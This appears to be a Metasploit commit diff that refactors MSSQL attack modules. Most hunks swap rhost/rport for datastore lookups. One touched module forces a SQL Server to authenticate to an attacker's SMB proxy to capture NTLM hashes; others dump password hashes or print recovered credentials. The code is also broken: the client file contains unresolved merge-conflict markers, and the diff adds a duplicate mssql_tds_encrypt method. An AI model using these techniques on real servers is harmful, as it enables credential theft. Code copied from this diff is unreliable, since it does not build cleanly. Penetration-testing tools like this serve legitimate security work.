client consolidation

convert first module from remote to client

move client to rex

remove metasploit mixin

lib/metasploit/framework/tcp/client.rb

@@ -73,6 +73,7 @@ module Client
         # @see Rex::Socket::Tcp
         # @see Rex::Socket::Tcp.create
         def connect(global = true, opts={})
+
           dossl = false
           if(opts.has_key?('SSL'))
             dossl = opts['SSL']
@@ -92,7 +93,7 @@ def connect(global = true, opts={})
               'SSLCipher'     =>  opts['SSLCipher'] || ssl_cipher,
               'Proxies'       => proxies,
               'Timeout'       => (opts['ConnectTimeout'] || connection_timeout || 10).to_i,
-              'Context'       => { 'Msf' => framework, 'MsfExploit' => framework_module }
+              'Context'       => { 'Msf' => framework, 'MsfExploit' => self }
               )
           # enable evasions on this socket
           set_tcp_evasions(nsock)

lib/msf/core/exploit/remote/mssql.rb

@@ -72,9 +72,6 @@ def mssql_ping(timeout=5)
     return mssql_ping_parse(resp)
   end
 
-  #
-  # Parse a 'ping' response and format as a hash
-  #
   def mssql_ping_parse(data)
     res = []
     var = nil
@@ -219,5 +216,13 @@ def mssql_tds_encrypt(pass)
     # Convert to unicode, swap 4 bits both ways, xor with 0xa5
     Rex::Text.to_unicode(pass).unpack('C*').map {|c| (((c & 0x0f) << 4) + ((c & 0xf0) >> 4)) ^ 0xa5 }.pack("C*")
   end
+
+  #
+  # Encrypt a password according to the TDS protocol (encode)
+  #
+  def mssql_tds_encrypt(pass)
+    # Convert to unicode, swap 4 bits both ways, xor with 0xa5
+    Rex::Text.to_unicode(pass).unpack('C*').map {|c| (((c & 0x0f) << 4) + ((c & 0xf0) >> 4)) ^ 0xa5 }.pack("C*")
+  end
 end
 end

lib/rex/proto/mssql/client.rb

@@ -46,22 +46,33 @@ class Client
         def initialize(framework_module, framework, rhost, rport = 1433)
           @framework_module       = framework_module
           @framework              = framework
+<<<<<<< HEAD
           @connection_timeout     = framework_module.datastore['ConnectTimeout']      || 30
           @max_send_size          = framework_module.datastore['TCP::max_send_size']  || 0
           @send_delay             = framework_module.datastore['TCP::send_delay']     || 0
 
           @auth                   = framework_module.datastore['Mssql::Auth']         || Msf::Exploit::Remote::AuthOption::AUTO
           @hostname               = framework_module.datastore['Mssql::Rhostname']    || ''
+=======
+          @connection_timeout     = framework_module.datastore['ConnectTimeout']     || 30
+          @max_send_size          = framework_module.datastore['TCP::max_send_size'] || 0
+          @send_delay             = framework_module.datastore['TCP::send_delay']    || 0
+
+          @auth                   = framework_module.datastore['Mssql::Auth'] || Msf::Exploit::Remote::AuthOption::AUTO
+>>>>>>> c1d192fd7d (Cleanup, put mssql_login_datastore back)
 
           @windows_authentication = framework_module.datastore['USE_WINDOWS_AUTHENT'] || false
           @tdsencryption          = framework_module.datastore['TDSENCRYPTION']       || false
           @hex2binary             = framework_module.datastore['HEX2BINARY']          || ''
+<<<<<<< HEAD
 
           @domain_controller_rhost = framework_module.datastore['DomainControllerRhost'] || ''
+=======
+>>>>>>> c1d192fd7d (Cleanup, put mssql_login_datastore back)
           @rhost = rhost
           @rport = rport
         end
-
+        
         #
         # This method connects to the server over TCP and attempts
         # to authenticate with the supplied username and password

modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb

@@ -28,13 +28,13 @@ def initialize(info = {})
 
     register_options(
       [
-        OptInt.new('FuzzNum', [true, 'Number of principal_ids to fuzz.', 10000]),
+        OptInt.new('FuzzNum', [true, 'Number of principal_ids to fuzz.', 10000])
       ])
   end
 
   def run
     # Check connection and issue initial query
-    print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
+    print_status("Attempting to connect to the database server at #{datastore['RHOST']}:#{datastore['RPORT']} as #{datastore['USERNAME']}...")
     if mssql_login_datastore
       print_good('Connected.')
     else
@@ -106,8 +106,8 @@ def run
 
     # Create output file
     this_service = report_service(
-      :host  => rhost,
-      :port => rport,
+      :host  => datastore['RHOST'],
+      :port => datastore['RPORT'],
       :name => 'mssql',
       :proto => 'tcp'
     )
@@ -175,7 +175,6 @@ def get_win_domain_users(windows_domain_sid)
 
   # Get windows domain
   def get_windows_domain
-
     # Setup query to check the domain
     sql = "SELECT DEFAULT_DOMAIN() as mydomain"
 

modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb

@@ -32,7 +32,7 @@ def initialize(info = {})
 
   def run
     # Check connection and issue initial query
-    print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
+    print_status("Attempting to connect to the database server at #{datastore['RHOST']}:#{datastore['RPORT']} as #{datastore['USERNAME']}...")
     if mssql_login_datastore
       print_good('Connected.')
     else

modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb

@@ -23,7 +23,8 @@ def initialize(info = {})
 
   def run
     # Check connection and issue initial query
-    print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
+    print_status("Attempting to connect to the database server at #{datastore['RHOST']}:#{datastore['RPORT']} as #{datastore['USERNAME']}...")
+
     if mssql_login_datastore
       print_good('Connected.')
     else

modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb

@@ -23,7 +23,8 @@ def initialize(info = {})
 
   def run
     # Check connection and issue initial query
-    print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
+    print_status("Attempting to connect to the database server at #{datastore['RHOST']}:#{datastore['RPORT']} as #{datastore['USERNAME']}...")
+
     if mssql_login_datastore
       print_good('Connected.')
     else

modules/auxiliary/admin/mssql/mssql_findandsampledata.rb

@@ -338,15 +338,16 @@ def sql_statement()
 
     # STATUSING
     print_line(" ")
-    print_status("Attempting to connect to the SQL Server at #{rhost}:#{rport}...")
+    print_status("Attempting to connect to the SQL Server at #{datastore['RHOST']}:#{datastore['RPORT']}...")
 
     # CREATE DATABASE CONNECTION AND SUBMIT QUERY WITH ERROR HANDLING
     begin
       result = mssql_query(sql, false) if mssql_login_datastore
+
       column_data = result[:rows]
-      print_good("Successfully connected to #{rhost}:#{rport}")
+      print_good("Successfully connected to #{datastore['RHOST']}:#{datastore['RPORT']}")
     rescue
-      print_error("Failed to connect to #{rhost}:#{rport}.")
+      print_error("Failed to connect to #{datastore['RHOST']}:#{datastore['RPORT']}.")
     return
     end
 

modules/auxiliary/admin/mssql/mssql_idf.rb

@@ -154,7 +154,7 @@ def run
       full_table.slice!(-1, 1)
       count_sql += full_table
 
-      result = mssql_query(count_sql, false) if mssql_login_datastore
+      result = mssql_query(count_sql, false) if mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
 
       count_data = result[:rows]
       row_count = count_data[0][0]

modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb

@@ -33,7 +33,7 @@ def initialize(info = {})
 
     register_options(
       [
-        OptString.new('SMBPROXY', [ true, 'IP of SMB proxy or sniffer.', '0.0.0.0']),
+        OptString.new('SMBPROXY', [ true, 'IP of SMB proxy or sniffer.', '0.0.0.0'])
       ])
   end
 
@@ -63,7 +63,7 @@ def run_host(ip)
   # Method to force sql server to authenticate
   def force_auth(sprocedure,smbproxy)
 
-    print_status("Forcing SQL Server at #{rhost} to auth to #{smbproxy} via #{sprocedure}...")
+    print_status("Forcing SQL Server at #{datastore['RHOST']} to auth to #{smbproxy} via #{sprocedure}...")
 
     # Generate random file name
     rand_filename = Rex::Text.rand_text_alpha(8, bad='')
@@ -72,7 +72,7 @@ def force_auth(sprocedure,smbproxy)
     sql = "#{sprocedure} '\\\\#{smbproxy}\\#{rand_filename}'"
     result = mssql_query(sql, false) if mssql_login_datastore
     column_data = result[:rows]
-    print_good("Successfully executed #{sprocedure} on #{rhost}")
+    print_good("Successfully executed #{sprocedure} on #{datastore['RHOST']}")
     print_good("Go check your SMB relay or capture module for goodies!")
 
   end

modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb

@@ -45,7 +45,7 @@ def make_login(opts={})
     uname = Rex::Text.to_unicode( opts[:uname] || "sa" )
     pname = opts[:pname_raw] || mssql_tds_encrypt( opts[:pname] || "" )
     aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
-    sname = Rex::Text.to_unicode( opts[:sname] || rhost )
+    sname = Rex::Text.to_unicode( opts[:sname] || datastore['RHOST'] )
     dname = Rex::Text.to_unicode( opts[:dname] || db )
 
     idx = pkt.size + 50 # lengths below

modules/auxiliary/fuzzers/tds/tds_login_username.rb

@@ -50,7 +50,7 @@ def do_login(opts={})
     uname = Rex::Text.to_unicode( opts[:uname] || "sa" )
     pname = opts[:pname_raw] || mssql_tds_encrypt( opts[:pname] || "" )
     aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
-    sname = Rex::Text.to_unicode( opts[:sname] || rhost )
+    sname = Rex::Text.to_unicode( opts[:sname] || datastore['RHOST'] )
     dname = Rex::Text.to_unicode( opts[:dname] || db )
 
     idx = pkt.size + 50 # lengths below

modules/auxiliary/gather/lansweeper_collector.rb

@@ -152,8 +152,8 @@ def run
       print_good("Credential name: #{row[0]} | username: #{row[1]} | password: #{pw}")
 
       report_cred(
-        :host => rhost,
-        :port => rport,
+        :host => datastore['RHOST'],
+        :port => datastore['RPORT'],
         :creds_name => row[0],
         :user => row[1],
         :password => pw

modules/auxiliary/scanner/mssql/mssql_hashdump.rb

@@ -25,14 +25,14 @@ def initialize
 
   def run_host(ip)
 
-    if !mssql_login_datastore
+    if !mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
       print_error("Invalid SQL Server credentials")
       return
     end
 
     service_data = {
         address: ip,
-        port: rport,
+        port: datastore['RPORT'],
         service_name: 'mssql',
         protocol: 'tcp',
         workspace_id: myworkspace_id
@@ -114,7 +114,7 @@ def report_hashes(mssql_hashes, version_year)
 
     service_data = {
         address: ::Rex::Socket.getaddress(rhost,true),
-        port: rport,
+        port: datastore['RPORT'],
         service_name: 'mssql',
         protocol: 'tcp',
         workspace_id: myworkspace_id

modules/auxiliary/scanner/mssql/mssql_login.rb

@@ -8,7 +8,6 @@
 require 'rex/proto/mssql/client'
 
 class MetasploitModule < Msf::Auxiliary
-  include Msf::Exploit::Remote::MSSQL
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::AuthBrute
 
@@ -39,7 +38,7 @@ def initialize
   end
 
   def run_host(ip)
-    print_status("#{rhost}:#{rport} - MSSQL - Starting authentication scanner.")
+    print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - MSSQL - Starting authentication scanner.")
 
     if datastore['TDSENCRYPTION']
       print_status("Manually enabled TLS/SSL to encrypt TDS payloads.")
@@ -53,7 +52,7 @@ def run_host(ip)
 
     scanner = Metasploit::Framework::LoginScanner::MSSQL.new(
         host: ip,
-        port: rport,
+        port: datastore['RPORT'],
         proxies: datastore['PROXIES'],
         cred_details: cred_collection,
         stop_on_success: datastore['STOP_ON_SUCCESS'],
@@ -87,10 +86,10 @@ def run_host(ip)
         credential_data[:core] = credential_core
         create_credential_login(credential_data)
 
-        print_good "#{ip}:#{rport} - Login Successful: #{result.credential}"
+        print_good "#{ip}:#{datastore['RPORT']} - Login Successful: #{result.credential}"
       else
         invalidate_login(credential_data)
-        vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
+        vprint_error "#{ip}:#{datastore['RPORT']} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
       end
     end
   end

modules/auxiliary/scanner/mssql/mssql_ping.rb

@@ -16,6 +16,10 @@ def initialize
       'License'        => MSF_LICENSE
     )
 
+    register_options(
+      [
+        OptInt.new('THREADS', [true, "The number of concurrent threads (max one per host)", 1]),
+      ])
     deregister_options('RPORT')
   end
 

modules/auxiliary/scanner/mssql/mssql_schemadump.rb

@@ -31,7 +31,7 @@ def initialize
   def run_host(ip)
 
     if !mssql_login_datastore
-      print_error("#{rhost}:#{rport} - Invalid SQL Server credentials")
+      print_error("#{datastore['RHOST']}:#{datastore['RPORT']} - Invalid SQL Server credentials")
       return
     end
 
@@ -48,10 +48,10 @@ def run_host(ip)
     return nil if mssql_schema.nil? or mssql_schema.empty?
     mssql_schema.each do |db|
       report_note(
-        :host  => rhost,
+        :host  => datastore['RHOST'],
         :type  => "mssql.db.schema",
         :data  => db,
-        :port  => rport,
+        :port  => datastore['RPORT'],
         :proto => 'tcp',
         :update => :unique_data
       )

modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb

@@ -72,7 +72,7 @@ def exploit
     end
 
     print_status("")
-    print_good("Successfully authenticated to #{rhost}:#{rport} with user 'sa' and password '#{pass}'")
+    print_good("Successfully authenticated to #{datastore['RHOST']}:#{datastore['RPORT']} with user 'sa' and password '#{pass}'")
     print_status("")
 
     exe = generate_payload_exe

modules/exploits/windows/mssql/mssql_clr_payload.rb

@@ -51,7 +51,7 @@ def initialize(info = {})
   end
 
   def check
-    unless mssql_login_datastore(datastore['DATABASE'])
+    unless mssql_login(datastore['USERNAME'], datastore['PASSWORD'], datastore['DATABASE'])
       vprint_status('Invalid SQL Server credentials')
       return Exploit::CheckCode::Detected
     end
@@ -133,7 +133,7 @@ def is_clr_enabled
   end
 
   def exploit
-    unless mssql_login_datastore(datastore['DATABASE'])
+    unless mssql_login(datastore['USERNAME'], datastore['PASSWORD'], datastore['DATABASE'])
       fail_with(Failure::BadConfig, 'Unable to login with the given credentials')
     end
 

modules/exploits/windows/mssql/mssql_linkcrawler.rb

@@ -76,7 +76,7 @@ def exploit
     print_status("-------------------------------------------------")
 
     # Check if credentials are correct
-    print_status("Attempting to connect to SQL Server at #{rhost}:#{rport}...")
+    print_status("Attempting to connect to SQL Server at #{datastore['RHOST']}:#{datastore['RPORT']}...")
 
     if !mssql_login_datastore
       print_error("Invalid SQL Server credentials")
@@ -240,8 +240,8 @@ def exploit
     this_service = nil
     if framework.db and framework.db.active
       this_service = report_service(
-        :host  => rhost,
-        :port => rport,
+        :host  => datastore['RHOST'],
+        :port => datastore['RPORT'],
         :name => 'mssql',
         :proto => 'tcp'
       )